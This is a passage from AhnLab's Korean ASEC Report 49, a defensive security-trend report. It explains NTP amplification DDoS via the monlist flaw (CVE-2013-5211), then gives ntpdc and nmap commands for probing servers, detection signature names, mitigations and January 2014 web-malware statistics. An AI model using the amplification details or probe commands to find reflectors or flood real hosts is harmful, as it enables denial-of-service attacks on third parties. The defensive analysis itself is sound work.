ASEC REPORT 49 SECURITY TREND 19 보안동향 02. 보안이슈 400Gbps 규모의 NTP 증폭 (Reflection) 공격발생지난해 12월말이후꾸준히증가하던 NTP 증폭분산서비스공격이이달에는 400G 규모로발생했다. 프랑스의한호스팅업체의 CEO는자신의트위터를통해 400GB가넘는대역폭으로 DDoS( 분산서비스거부공격 ) 공격을받고있다고전했다. (* 출처 : http://securityaffairs.co/wordpress/22159/cybercrime/400gbps-distributed-denial-of-service.html) NTP 증폭공격은다음과같은형태로이루어진다. 1 공격자는출발지 IP 를공격대상 IP 로변조하여서버에질의한다 (NTP 의경우 monlist 등 ). 2 서버는질의에대한응답을변조된 IP 즉, 공격대상 IP 로전송한다. 3 공격자는이러한형태의질의를많은수의 NTP 서버에대량으로시도한다. 4 결과적으로대량의응답패킷이공격대상 IP 로전송된다. 그림 2-2 프랑스의호스팅업체에발생한 400G NTP 증폭공격 (* 출처 : 매튜프린스 (Matthew Prince) 의트위터, https://twitter.com/ eastdakota) 이전의증폭공격은도메인네임시스템 (DNS) 서버에대해이루어졌다. UDP(User Datagram Protocol) 기반의프로토콜은 TCP와다르게출발지 IP 주소를속이기쉽고, 작은요청으로커다란응답을만들수있기때문에공격자들이자주사용한다. 최근에는이러한 UDP 프로토콜기반공격중에서도증폭효과가가장큰 NTP 증폭공격의발생빈도가증가하기시작했다. [ 그림 2-3] 은대역폭에대한증폭효과테스트결과를나타낸것이다. 그림 2-4 NTP 증폭공격구조도 (* 출처 : http://thehackernews.com/2014/01/network-time-protocol- Reflection-DDoS-Attack-Tool.html) NTP를이용한 DDoS 공격은 2013년 10월경부터 NTP의몬리스트 (monlist) 기능이증폭공격에사용될수있다고알려진이후계속증가하는추세이다. 이몬리스트기능은 NTP 서버에최근접속한시스템목록을가져올때사용하며, 서버에대한관리및모니터링용도로사용하는기능이다. 이기능은 ntpd 데몬의 ntp_request.c 안에구현되어있으며 4.2.7p26 버전보다낮은경우 REQ_MON_GETLIST 요청과 REQ_MON_GETLIST_1 요청을통해요청패킷보다큰응답패킷을생성할수있다. (CVE-2013-5211) 그림 2-3 각프로토콜별증폭크기비교 그림 2-5 2013 년 10 월이후증가추세인 NTP 증폭공격
ASEC REPORT 49 SECURITY TREND 20 [ 그림 2-6] 은실제취약한서버에 MON_GET_LIST_1 요청을전송한결과이다. 맨윗줄의패킷이요청패킷으로크기는 90바이트 (byte) 이다. 이서버에서는 482 바이트패킷 100개를응답하였다. 응답패킷의크기는요청패킷크기의약 535배에해당한다. 공격자는이러한특징을이용하여대량의트래픽을생성할때 NTP 프로토콜을사용할수있다. 둘째, 취약점이제거된버전으로업그레이드한다. 취약점은 4.2.7p26 버전보다낮은경우발생한다. 4.2.7의최신버전으로업데이트하는것으로취약점을제거할수있다. 안랩의트러스트가드 (TrustGurd) 제품군에는해당시그니처가적용되어있다. ddos_ntp_reflection_monlist_request(cve-2013-5211) ddos_ntp_reflection_monlist_response(cve-2013-5211) 그림 2-6 NTP 몬리스트요청패킷 NTP 서버의취약점을테스트하는방법에대해알아보자. 취약점테스트는크게두가지방법이있다. *nix 계열의운영체제를사용중이라면 ntpdc 명령어를이용할수있다. #/usr/sbin/ntpdc <remote server> monlist 또는 #ntpdc -n -c monlist <remote server> 서버로부터응답이있는경우취약하게설정된서버로판단될수있다. 취약점이없는경우 요청한시간이경과됐다 (Request Timed out) 라는에러메시지가뜬다. 네트워크스캐닝도구인 NMAP(http://nmap.org/) 에취약점을스캐닝할수있도록스크립트를추가할수있다. NTP 증폭공격에대한취약점을테스트하는스크립트는다음링크에서다운로드할수있다. (* 출처 : http://www.arbornetworks.com/asert/2014/02/ntp-attackswelcome-to-the-hockey-stick-era/) https://www.nmap.org/nmap-exp/patrik/nmap-brute/scripts/ntpmonlist.nse nmap -su -pu:123 -Pn -n --script=ntp-monlist <remote server> 위명령어를통해접속한호스트들의목록을받아오는경우취약한것으로판단할수있다. 마지막으로취약점제거방법에대해알아보자. 첫째, 몬리스트요청에응답하지않도록설정파일을수정하는방법이 있다 (noquery 옵션 ). ntp.conf의내용을 restrict default noquery로변경한다.
ASEC REPORT 49 WEB SECURITY TREND 21 웹보안동향 01. 웹보안통계 웹사이트악성코드동향 안랩의웹브라우저보안서비스인사이트가드 (SiteGuard) 를활용한웹사이트보안통계자료에의하 면, 2014 년 1 월웹을통한악성코드발견건수는 2013 년 12 월 1161 건보다 126 건증가한 1287 건으 로나타났다. 악성코드유형은총 11 종이감소한 95 종이며, 악성코드가발견된도메인은 55 개늘어 난 180 개, 악성코드가발견된 URL 수도 92 건증가한 320 건으로나타났다. 표 3-1 2014 년 1 월웹사이트보안현황 악성코드발견건수 1,161 1 월 12 월 1,287 +10.9% 악성코드유형 95 106 악성코드가발견된도메인 180 125 악성코드가발견된 URL 320 228 월별악성코드배포 URL 차단건수 2014 년 1 월웹을통한악성코드발견건수는전월 1161 건의 111% 수준인 1287 건이다. 그림 3-1 월별웹을통한악성코드발견건수변화추이 10,000 5,000 0 1,290 1,161 1,287 69.4% 10.0% 10.9% 11 12 01
ASEC REPORT 49 WEB SECURITY TREND 22 월별악성코드유형 2014 년 1 월악성코드유형은전월 106 건의 90% 수준인 95 건이다. 그림 3-2 월별악성코드유형수변화추이 500 250 101 106 95 43.6% 5.0% 10.4% 0 11 12 01 월별악성코드가발견된도메인 2014 년 1 월악성코드가발견된도메인은전월 125 건의 144% 수준인 180 건이다. 그림 3-3 악성코드가발견된도메인수변화추이 300 200 100 71 41.3% 125 76.0% 180 44.0% 0 11 12 01 월별악성코드가발견된 URL 2014 년 1 월악성코드가발견된 URL 은전월 228 건의 140% 수준인 320 건이다. 그림 3-4 월별악성코드가발견된 URL 수변화추이 1,000 750 500 250 154 64.4% 228 48.1% 320 40.4% 0 11 12 01
ASEC REPORT 49 WEB SECURITY TREND 23 월별악성코드유형 악성코드유형별배포수를보면트로이목마가 1044 건으로전체의 81.1% 로가장많았고, 스파이웨 어는 82 건으로 6.4% 를차지한것으로나타났다. 표 3-2 악성코드유형별배포수 유형 건수 비율 TROJAN 1,044 81.1% SPYWARE 82 6.4% ADWARE 61 4.7% DROPPER 15 1.2% DOWNLOADER 9 0.7% JOKE 2 0.2% ETC 74 5.7% 1,287 100.0 % 그림 3-5 악성코드유형별배포수 1,200 1,044 600 0 TROJAN SPYWARE 82 61 ADWARE DROPPER 15 9 2 DOWNLOADER JOKE 74 ETC 악성코드최다배포수 악성코드배포최다 10 건중에서는 Trojan/Win32.Agent 가 336 건으로가장많았으며, Top10 에 Win- Trojan/Dwonloader.950152 를포함해 3 건이새로나타났다. 표 3-3 악성코드배포최다 10건 순위 등락 악성코드명 건수 비율 1 Trojan/Win32.Agent 336 35.7% 2 NEW Win-Trojan/Dwonloader.950152 141 15% 3 NEW Trojan/Win32.Bjlog 135 14.3% 4 NEW Trojan/Win32.Downloader 93 9.9% 5 3 Spyware/Win32.Gajai 82 8.7% 6 2 Trojan/Win32.KorAd 35 3.7% 7 2 Win-Trojan/Downloader.12800.LU 33 3.5% 8 1 Adware/Win32.Clicker 32 3.4% 9 3 Trojan/ Win32.Starter 29 3.1% 10 6 Trojan/ Win32.Onescan 25 2.7% TOTAL 941 100.0 %
ASEC REPORT CONTRIBUTORS 집필진 책임연구원차민석선임연구원박종석선임연구원강동현선임연구원김창엽선임연구원이도현연구원강민철 참여연구원 ASEC 연구원 편집 안랩콘텐츠기획팀 디자인 안랩 UX 디자인팀 발행처 주식회사안랩경기도성남시분당구판교역로 220 T. 031-722-8000 F. 031-722-8901 본간행물의어떤부분도안랩의서면동의없이복제, 복사, 검색시스템으로저장또는전송될수없습니다. 안랩, 안랩로고는안랩의등록상표입니다. 그외다른제품또는회사이름은해당소유자의상표또는등록상표일수있습니다. 본문서에수록된정보는고지없이변경될수있습니다. 2013 AhnLab, Inc. All rights reserved.